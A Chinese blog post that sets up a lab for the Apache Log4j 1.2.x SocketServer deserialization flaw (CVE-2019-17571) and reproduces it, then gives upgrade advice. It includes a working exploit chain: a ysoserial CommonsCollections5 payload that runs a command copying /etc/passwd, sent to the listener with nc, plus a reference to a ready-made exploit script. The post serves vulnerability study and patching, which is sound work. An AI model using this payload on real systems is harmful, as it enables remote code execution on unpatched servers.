(环境搭建+复现)CVE-2019-17571 Apache Log4j SocketServer 反序列化漏洞

最新推荐文章于 2024-06-12 12:15:11 发布
最新推荐文章于 2024-06-12 12:15:11 发布
阅读量9k 收藏 13
点赞数 2
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/105295629
版权

1、【CVE编号】

CVE-2019-17571

2、【漏洞名称】

Apache Log4j SocketServer 反序列化漏洞

3、【靶标分类】

通用漏洞组件类靶标

4、【影响版本】

Log4j1.2.x<=1.2.17

5、【漏洞分类】

代码执行

6、【漏洞等级】

7、【漏洞简介】

Apache Log4j 是一个基于 Java 的日志记录工具,是 Apache 软件基金会的一个项目,是几种 Java 日志框架之一。
近日,Apache Log4j 官方披露在 1.2.x 版本中的SocketServer类存在反序列化漏洞(CVE-2019-17571),攻击者可利用漏洞可实现远程代码执行。
Log4j 1.2.x 版本中的 org.apache.log4j.net.SocketServer 类,存在反序列化漏洞。使用 Log4j SocketServer 类创建的 Socket 监听服务处理接受数据时,容易对不可信数据进行反序列化,结合反序列化小工具,攻击者可以实现远程代码执行。

环境搭建
8、【靶标运行环境】

标靶运行操作系统系统:Ubuntu1804 64位
操作系统内核:4.15.0-92-generic
组件版本:log4j 1.2.17
Java版本:1.8.0_242
端口号:8888
工具:ysoserial

9、【靶标搭建过程】
1、需要的jar包和ysoserial工具
在这里插入图片描述
2、其中配置文件log4j.properties内容如下

log4j.rootCategory=DEBUG,stdout
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
log4j.appender.stdout.threshold=DEBUG
log4j.appender.stdout.layout.ConversionPattern=[%d{yyy-MM-dd HH:mm:ss,SSS}]-[%p]-[MSG!:%m]-[%c\:%L]%n

3、启动SocketServer端即可

root@ubuntu:~/Desktop/CVE-2019-17571_Log4j反序列化# java -cp log4j-1.2.17.jar:commons-collections-3.1.jar org.apache.log4j.net.SocketServer 8888 ./log4j.properties ./

在这里插入图片描述

服务已经启动,正在监听8888端口
在这里插入图片描述
10、靶场利用过程
1、使用ysoserial生成poc

java -jar ysoserial.jar CommonsCollections5 "cp /etc/passwd /tmp/passwd" > test.bin

2、攻击靶场环境

cat test.bin | nc 127.0.0.1 8888

在这里插入图片描述
3、此时我们看一下/tmp 目录下,成功将/etc/passwd 文件复制到了 /tmp/passwd 中
在这里插入图片描述
4、可以通过运行CVE-2019-17571.py快速达到上述目的
python3 CVE-2019-17571.py
在这里插入图片描述
11、【解决方案】
1、Apache Log4j 的 1.2 系列版本官方在2015年8月已停止维护,在 2.8.2 版本中已修复了该漏洞,建议尽快升级到 2.8.2 或更高的版本;
下载地址:https://logging.apache.org/log4j/2.x/download.html

2、停止使用 Log4j 的 SocketServer 类创建 Socket 服务,未使用 Log4j 的 SocketServer 类的功能不受漏洞影响;

Referer:

https://www.geek-by.xyz/2019/12/30/apache-log4j-socketserver-fan-xu-lie-hua-lou-dong-cve-2019-17571/

https://xz.aliyun.com/t/7010

https://github.com/shadow-horse/CVE-2019-17571

daxi0ng
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
Apache Log4j 漏洞分析
m0_73826804的博客
03-07 411
Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具。Log4j 1.2版本中包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列化的日志事件并对其进行反序列化,在结合反序列化工具使用时,可以利用该类远程执行任意代码。目前官方已在Apache Log4j 2.8.2版本之后修复了该漏洞,请受影响的用户升级至2.8.2 或更高的版本进行防护.方便测试,添加JDK7U21的漏洞环境。
apache log4j漏洞复现
热门推荐
Shanfenglan's blog
12-10 6万+
文章目录1. Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)利用条件利用2. CVE-2019-17571利用条件利用3. apache log4j rce利用条件环境搭建利用 1. Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645) Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 利用条件
Spring Boot常见的报错以及解决方式
最新发布
qq_57320832的博客
06-12 1108
当遇到Spring Boot端口被占用的问题时,首先需要确定端口是否已被其他应用程序占用,然后尝试停止占用端口的进程或修改应用程序的端口配置。在处理过程中,应注意保留重要的工作成果,并遵循良好的开发习惯。当尝试启动Spring Boot应用程序时,如果配置的端口已被其他应用程序占用,那么应用程序将无法在该端口上启动,并会抛出相应的错误。如果在更换端口后仍然遇到端口被占用的问题,可能是由于电脑后台运行的应用过多,或者某个项目添加了另一个项目的依赖导致端口冲突。
log4j CVE-2019-17571 漏洞复现
01-02 1万+
一、漏洞描述 Log4j1.2版本中包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列化的日志事件并对其进行反序列化,在结合反序列化工具使用时,可以利用该类远程执行任意代码。 二、漏洞复现 2.1 启动SocketServer端 import org.apache.log4j.Logger; import org.apache.log...
探索 CVE-2019-17571:一款用于网络安全研究的重要工具
gitblog_00007的博客
04-05 451
探索 CVE-2019-17571:一款用于网络安全研究的重要工具 项目地址:https://gitcode.com/shadow-horse/CVE-2019-17571 在网络安全的世界里,了解漏洞并学习如何防护或利用它们是至关重要的。CVE-2019-17571 是一个公开的开源项目,它专注于研究针对 FortiOS 设备的一个严重漏洞。本文将深入探讨这个项目的细节,其技术背景,用途,以及为...
Java安全之log4j反序列化漏洞分析
qq_43966957的博客
12-29 783
log4j用的其实还是比较多,记录一些Java的日志,这个相信接触过Java的都知道,在此不做多的赘诉。漏洞版本:CVE-2019-17571漏洞原因是因为调用开启一个端口,进行接受数据,进行反序列化操作。根据官方描述作用是把接受到的作为本地的日志记录事件,再使用在服务器端配置的Log4J环境来记录日志。默认可能会开启在4560端口中。
[20][03][81] Log4j 反序列化漏洞(CVE-2019-17571)
安全新司机
12-16 1461
文章目录1. 组件基本信息1.1 pom 信息1.2 影响版本1.3 漏洞场景2. 漏洞复现2.1 引入pom组件2.2 新建 log4j.properties2.3 Log4jLeak 代码2.4 下载 ysoserial.jar2.5 生成 playload2.5 启动程序3. 漏洞源码分析3.1 SimpleSocketServer 类3.2 SocketNode 类4. 反射到外网 1. 组件基本信息 1.1 pom 信息 <groupId>log4j</groupId> &
Log4j漏洞修复方案
一颗学徒
12-13 4571
Log4j漏洞修复方案
log4J-1.2.17.zip
09-06
在强调可重用组件开发的今天,除了自己从头到尾开发一个可重用的日志操作类外,Apache为我们提供了一个强有力的日志操作包-Log4jLog4jApache的一个开放源代码项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件、甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。
log4j.1.2.17
02-22
开发阶段发现程序的问题 , 排除错误 , 产品阶段 , 可以记录系统运行的一些状态信息 , 程序运行的状态 ,log4j.1.2.17
apache-log4j-1.2.17
09-28
apache-log4j-1.2.17解决导入问题,日志输出的问题,import
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564,Apache-Dubbo反序列化漏洞
Log4j 严重漏洞修最新修复方案参考
Javaesandyou的博客
12-21 1万+
CVE-2021-44228,原理上是 log4j-core 代码中的 JNDI 注入漏洞。这个漏洞可以直接导致服务器被入侵,而且由于“日志”场景的特性,攻击数据可以多层传导,甚至可以威胁到纯内网的服务器。log4j 作为 Java 开发的基础公共日志类,使用范围非常广,漏洞必定影响深远,想想当年commons-collections反序列化漏洞的影响范围。 Github漏洞公告: https://github.com/advisories/GHSA-jfh8-c2jp-5v3q 影响 < 2.1
「Java工具类」BeanCopyUtil对象复制工具类
Java Farmer
10-31 1万+
介绍语 本号主要是Java常用关键技术点,通用工具类的分享;以及springboot+springcloud+Mybatisplus+druid+mysql+redis+swagger+maven+docker等集成框架的技术分享;datax、kafka、flink等大数据处理框架的技术分享。文章会不断更新,欢迎码友关注点赞收藏转发! 望各位码友点击关注,冲1000粉。后面会录制一些视频教程,图文和视频结合,比如:图书介绍网站系统、抢购系统、大数据中台系统等。技术才是程序猿的最爱,码友们冲啊 如果码友
log4j漏洞log4j 1.x漏洞依赖包解决方案
你的博客
05-05 4100
那么自己的程序中确定是没有引用了,那log4j的引用必定是程序中的第三方依赖包了。如果觉得上面办法比较麻烦,也并不适合自己的场景,还有一个办法,这个办法只能躲过扫描,并未实际解决log4j漏洞问题,那就是将引入的log4j 1.2.17的包中的版本去改掉,直接修改配置中的版本号,就能躲过扫描。对于应用中我们自己写的程序全部替换为新版本。考虑了很久,某时灵光一闪,既然没有log4j的引用类,那么就在程序中创建这些类吧,这样log4j的几个自定义类仍然可以被其他包引用,而应用中又不需要引用log4j的原始包。
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.9.x 版本。 CVE-2019-14439 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.6.x 至 2.9.x 版本。 为了解决这些漏洞,建议开发人员尽快升级到最新版本的 Jackson-databind 库。另外,还可以考虑限制反序列化操作的使用,以减少潜在的风险。记住及时关注安全公告,并采取相应的措施来保护应用程序免受可能的攻击。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值